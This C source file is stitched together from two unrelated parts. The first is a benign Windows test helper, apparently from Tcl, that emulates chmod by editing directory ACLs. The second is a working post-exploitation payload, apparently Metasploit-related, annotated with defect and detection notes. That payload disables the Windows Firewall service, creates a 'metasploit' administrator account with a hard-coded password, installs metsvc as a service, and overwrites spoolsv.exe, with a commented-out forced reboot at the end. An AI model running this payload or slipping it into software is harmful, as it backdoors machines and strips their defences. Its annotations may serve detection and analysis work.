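/*
 *----------------------------------------------------------------------
 *
 * TestplatformChmod --
 *
 *	Windows back end for the test "chmod" command. A directory is made
 *	"read-only" by prepending an ACCESS_DENIED ACE for the World
 *	(Everyone) SID that covers the rights in readOnlyMask; clearing the
 *	write bits removes that ACE again. Plain files, and the ordinary
 *	attribute bits of directories, are handled by the C runtime chmod()
 *	once the ACL work is done.
 *
 * Results:
 *	-1 if nativePath does not exist or its DACL cannot be read or
 *	rewritten; otherwise the result of chmod(nativePath, pmode).
 *
 * Side effects:
 *	Rewrites the directory's DACL. Explicit ACEs are preserved, inherited
 *	ACEs are dropped from the rebuilt list (see the loop below).
 *
 * NOTE(review): the deny ACE targets Everyone, owner included, but the
 *	owner keeps the implicit right to rewrite the DACL, so this is a test
 *	convenience and not a security boundary. Only ACL_REVISION ACEs are
 *	expected; other ACE types are copied by size without inspection.
 *
 *----------------------------------------------------------------------
 */
static int
TestplatformChmod(
    const char *nativePath,	/* Path in the native (ANSI) encoding. */
    int pmode)			/* POSIX mode bits; only 0222 is consulted here. */
{
    static const SECURITY_INFORMATION infoBits =
	    OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION
	    | DACL_SECURITY_INFORMATION;

    /*
     * Rights withheld from Everyone by the "read-only tag": everything that
     * creates, modifies or deletes content in or below the directory.
     */
    static const DWORD readOnlyMask =
	    FILE_DELETE_CHILD | FILE_ADD_FILE | FILE_ADD_SUBDIRECTORY
	    | FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA | DELETE;

    const BOOL set_readOnly = !(pmode & 0222);
    BOOL acl_readOnly_found = FALSE, curAclPresent, curAclDefaulted;
    SID_IDENTIFIER_AUTHORITY userSidAuthority = { SECURITY_WORLD_SID_AUTHORITY };
    BYTE *secDesc = NULL;
    DWORD secDescLen = 0, attr, newAclSize;
    ACL_SIZE_INFORMATION ACLSize;
    PACL curAcl, newAcl = NULL;
    WORD j;
    SID *userSid = NULL;
    int res = 0;

    attr = GetFileAttributesA(nativePath);
    if (attr == INVALID_FILE_ATTRIBUTES) {
	/* nativePath not found (or not accessible). */
	res = -1;
	goto done;
    }

    /* Only directories get the ACL treatment; files go straight to chmod(). */
    if (!(attr & FILE_ATTRIBUTE_DIRECTORY)) {
	goto done;
    }

    /* Pessimistic default; cleared only once the DACL work has succeeded. */
    res = -1;

    /*
     * Read the security descriptor. The first call has no buffer and is
     * expected to fail with ERROR_INSUFFICIENT_BUFFER, reporting the size.
     */
    if (!GetFileSecurityA(nativePath, infoBits, NULL, 0, &secDescLen)) {
	DWORD secDescLen2 = 0;

	if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
	    goto done;
	}
	secDesc = (BYTE *) ckalloc(secDescLen);
	if (!GetFileSecurityA(nativePath, infoBits,
		(PSECURITY_DESCRIPTOR) secDesc, secDescLen, &secDescLen2)
		|| (secDescLen < secDescLen2)) {
	    goto done;
	}
    }
    if (secDesc == NULL) {
	/*
	 * The sizing call "succeeded" without a buffer; there is nothing to
	 * parse, so fail explicitly instead of handing NULL to the parser.
	 */
	goto done;
    }

    /* Build the World (Everyone) SID, S-1-1-0. */
    userSid = (SID *) ckalloc(GetSidLengthRequired((UCHAR) 1));
    InitializeSid(userSid, &userSidAuthority, (BYTE) 1);
    *(GetSidSubAuthority(userSid, 0)) = SECURITY_WORLD_RID;

    /* If curAclPresent is FALSE then curAcl and curAclDefaulted are not valid. */
    if (!GetSecurityDescriptorDacl((PSECURITY_DESCRIPTOR) secDesc,
	    &curAclPresent, &curAcl, &curAclDefaulted)) {
	goto done;
    }
    if (!curAclPresent || !curAcl) {
	/*
	 * No DACL (a NULL DACL grants everyone full access). There are no
	 * ACEs to copy, but the rebuilt ACL still needs room for its own
	 * header. Counting 0 bytes here left newAclSize too small for the
	 * header plus the deny ACE, so AddAccessDeniedAce ran out of space
	 * and making such a directory read-only always failed.
	 */
	ACLSize.AclBytesInUse = sizeof(ACL);
	ACLSize.AceCount = 0;
    } else if (!GetAclInformation(curAcl, &ACLSize, sizeof(ACLSize),
	    AclSizeInformation)) {
	goto done;
    }

    /*
     * Size of the new ACL: the bytes already in use (header + ACEs) plus one
     * ACCESS_DENIED_ACE, whose trailing SidStart DWORD is replaced by the
     * full World SID.
     */
    newAclSize = ACLSize.AclBytesInUse + sizeof(ACCESS_DENIED_ACE)
	    + GetLengthSid(userSid) - sizeof(DWORD);
    newAcl = (ACL *) ckalloc(newAclSize);
    if (!InitializeAcl(newAcl, newAclSize, ACL_REVISION)) {
	goto done;
    }

    /*
     * Deny ACEs must precede allow ACEs in a canonical DACL, so the
     * "read-only tag" goes in first, before any existing ACE is copied.
     */
    if (set_readOnly && !AddAccessDeniedAce(newAcl, ACL_REVISION,
	    readOnlyMask, userSid)) {
	goto done;
    }

    acl_readOnly_found = FALSE;
    for (j = 0; j < ACLSize.AceCount; j++) {
	LPVOID pACE2;
	ACE_HEADER *phACE2;

	if (!GetAce(curAcl, j, &pACE2)) {
	    goto done;
	}
	phACE2 = (ACE_HEADER *) pACE2;

	/*
	 * Do NOT propagate inherited ACEs. NOTE(review): presumably they are
	 * re-derived from the parent when the DACL is written, since the
	 * PROTECTED_DACL flag is not requested below — verify before relying
	 * on it.
	 */
	if (phACE2->AceFlags & INHERITED_ACE) {
	    continue;
	}

	/*
	 * Recognise an existing read-only tag (same mask, World SID) and drop
	 * it: it was either re-added above or is the one being removed.
	 */
	if (phACE2->AceType == ACCESS_DENIED_ACE_TYPE) {
	    ACCESS_DENIED_ACE *pACEd = (ACCESS_DENIED_ACE *) phACE2;

	    if (pACEd->Mask == readOnlyMask
		    && EqualSid(userSid, (PSID) &pACEd->SidStart)) {
		acl_readOnly_found = TRUE;
		continue;
	    }
	}

	/* Every other explicit ACE is carried over verbatim. */
	if (!AddAce(newAcl, ACL_REVISION, MAXDWORD, pACE2, phACE2->AceSize)) {
	    goto done;
	}
    }

    /*
     * Nothing to write if the tag is already in the requested state;
     * otherwise apply the rebuilt DACL.
     */
    if (set_readOnly == acl_readOnly_found
	    || SetNamedSecurityInfoA((LPSTR) nativePath, SE_FILE_OBJECT,
		    DACL_SECURITY_INFORMATION, NULL, NULL, newAcl, NULL)
		    == ERROR_SUCCESS) {
	res = 0;
    }

  done:
    if (secDesc) {
	ckfree((char *) secDesc);
    }
    if (newAcl) {
	ckfree((char *) newAcl);
    }
    if (userSid) {
	ckfree((char *) userSid);
    }
    if (res != 0) {
	return res;
    }

    /* Run the normal chmod for the remaining mode bits. */
    return chmod(nativePath, pmode);
}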
/*
 * start --
 *
 *	Post-exploitation payload entry point (the hard-coded account name and
 *	metsvc suggest Metasploit tooling). Every step needs administrative
 *	rights in the host process' token and no API result is checked, so
 *	any failure is silent.
 *
 *	Sequence, in order:
 *	  1. Disable WOW64 file-system redirection if the export exists, then
 *	     chdir to the Windows directory so the relative System32 /
 *	     SysWOW64 paths below resolve to the real directories. Redirection
 *	     is never restored inside this function.
 *	  2. Write HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc\Start = 4
 *	     (SERVICE_DISABLED): the Windows Firewall service stays off from
 *	     the next boot (the commented-out reboot block at the end exists
 *	     to make that immediate).
 *	  3. Create local user "metasploit" with a hard-coded password and add
 *	     it to the local Administrators group.
 *	  4. Run "metsvc.exe install-service" from SysWOW64 or System32.
 *	  5. Take ownership (LocalSystem) of spoolsv.exe and spoolsv.bak.exe
 *	     and move the .bak copy back over spoolsv.exe, retrying forever —
 *	     presumably the caller replaced spoolsv.exe with this payload
 *	     earlier; that part is not visible here.
 *
 *	Detection notes (all grounded in the literals below): the MpsSvc
 *	Start value, the "metasploit" local administrator, metsvc.exe under
 *	System32 / SysWOW64, and the transient System32\spoolsv.bak.exe.
 *
 * Known defects, deliberately left unchanged (this is reference material):
 *	- mkey is used uninitialized when RegOpenKeyExA fails.
 *	- The LocalAlloc result is not NULL-checked before CreateWellKnownSid.
 *	- The process handles returned in proci are never closed.
 *	- STARTUPINFOA.cb is left at 0 rather than sizeof(strt).
 *	- The MoveFileA loop has no upper bound.
 *	- Using the presence of the Wow64DisableWow64FsRedirection export as
 *	  the "64-bit" test is the original author's heuristic; not verified.
 */
void start(){
    //fix wow32-64 fsredir
    PVOID OldValue;
    Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress(
        GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection");
    if( disableWow ) disableWow(&OldValue);
    char windowsPath[MAX_PATH];
    GetWindowsDirectoryA(windowsPath,MAX_PATH);
    SetCurrentDirectoryA(windowsPath);

    //turn off fw: Start=4 is SERVICE_DISABLED; mkey is garbage if the open fails
    HKEY mkey;
    DWORD four = 4;
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc", 0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey);
    RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD));
    RegCloseKey(mkey);

    //add user: hard-coded credentials, password never expires
    USER_INFO_1 userinfo;
    userinfo.usri1_name = L"metasploit";
    userinfo.usri1_password = L"p@SSw0rd!123456";
    userinfo.usri1_priv = USER_PRIV_USER;
    userinfo.usri1_home_dir = NULL;
    userinfo.usri1_comment = L"";
    userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD;
    userinfo.usri1_script_path = NULL;
    DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL);
    if(res == NERR_Success){
        //group membership is only attempted when the account was created
        LOCALGROUP_MEMBERS_INFO_3 lgmi3;
        lgmi3.lgrmi3_domainandname = userinfo.usri1_name;
        NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1);
    }

    //start metsvc: both structs are zeroed byte-by-byte instead of via memset
    STARTUPINFOA strt;
    PROCESS_INFORMATION proci;
    for(int i = 0; i < sizeof(strt); i++) ((char*)&strt)[i]=0;
    for(int i = 0; i < sizeof(proci); i++) ((char*)&proci)[i]=0;
    if( disableWow )//if 64 bit
        CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
    else
        CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);

    //permissions, owner? -- owner is reset to LocalSystem on both spooler binaries
    DWORD sidSize = SECURITY_MAX_SID_SIZE;
    PSID ownersid = LocalAlloc(LMEM_FIXED,sidSize);
    CreateWellKnownSid(WinLocalSystemSid, NULL, ownersid, &sidSize);
    SetNamedSecurityInfoA("System32\\spoolsv.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);
    SetNamedSecurityInfoA("System32\\spoolsv.bak.exe",SE_FILE_OBJECT,OWNER_SECURITY_INFORMATION,ownersid,NULL,NULL,NULL);

    //copy file back: spins until the move succeeds, deleting the target on each miss
    while(MoveFileA("System32\\spoolsv.bak.exe","System32\\spoolsv.exe") == 0){
        DeleteFileA("System32\\spoolsv.exe");
        Sleep(100);
    }

    //This can be added so fw disable takes effect immediately and this process exits
    /*/reboot
    HANDLE tokenh;
    OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh);
    TOKEN_PRIVILEGES tkp, otkp;
    DWORD oldsize;
    tkp.PrivilegeCount = 1;
    LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid));
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize);
    ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);//*/
}